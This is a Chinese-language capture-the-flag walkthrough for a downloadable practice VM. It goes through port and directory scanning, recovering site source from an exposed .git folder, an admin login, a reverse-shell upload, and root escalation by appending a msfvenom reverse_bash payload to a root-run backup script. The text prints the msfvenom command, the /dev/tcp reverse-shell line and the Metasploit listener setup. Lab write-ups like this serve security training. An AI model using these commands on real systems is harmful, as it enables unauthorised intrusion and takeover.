靶机IP :192.168.56.103
nmap扫
nmap -sS -Pn -A -p- -n 192.168.56.103

靶机比较简单,只开启了22和80端口
nmap探测到了192.168.56.103:80/.git/
WEB渗透
先探测下目录
dirb http://192.168.56.103

发现了几个可疑目录:
http://192.168.56.103/.git/HEAD
http://192.168.56.103/admin.php
http://192.168.56.103/upload/
admin.php是一个登录页面

/.git/HEAD/提示 http://192.168.56.103/.git/refs/heads/master
得到一串hash
3db5628b550f5c9c9f6f663cd158374035a6eaa0
关于/.git,查看下资料 https://blog.csdn.net/mayfla/article/details/78653396
将网站站点下的一些项目存放在git文件夹下
可以利用githach工具,将git文件夹down下来,进行审计查看
GitHack工具github地址:https://github.com/lijiejie/GitHack
python GitHack.py http://192.168.56.103/.git/

getshell
查看下admin.php的源码

拿到了用户密码
admin | st@mpch0rdt.ightiRu$glo0mappL3
登录后进入网站后台,发现了上传点

直接上传反弹shell,kali中nc监听,触发反弹

靶机没有python环境
进入home目录下的当前用户,发现了第一个flag,还发现了backup等备份文件

查看该sh文件,

#!/bin/bash
zip -r /home/eric/backup.zip /var/www/html
就是将网站的根目录下打包到当前目录的backup.zip中
提权
用msfvenom生成提权的sh脚本
msfvenom -p cmd/unix/reverse_bash LHOST=192.168.56.102 LPORT=9999 -f raw > shell.sh

0<&63-;exec 63<>/dev/tcp/192.168.56.102/9999;sh <&63 >&63 2>&63
将生成的sh脚本,添加到backup.sh中等待执行即可
在msf中选择相应的payload进行监听
use exploit/multi/handler
set payload cmd/unix/reverse_bash

反弹成功后,拿到root权限,直接get flag

总结
该靶机总体是比较常规:
1、利用GitHack工具down下该站点的源文件
2、进入后台后上传反弹shell
3、发现可以执行root用户的权限,即可获取root-shell,通过msf生成的payload和反弹监听拿到root
靶机百度云下载
链接:https://pan.baidu.com/s/1lu4Axhsl9lxUUhb5HWO2FQ
提取码:qagq
网友评论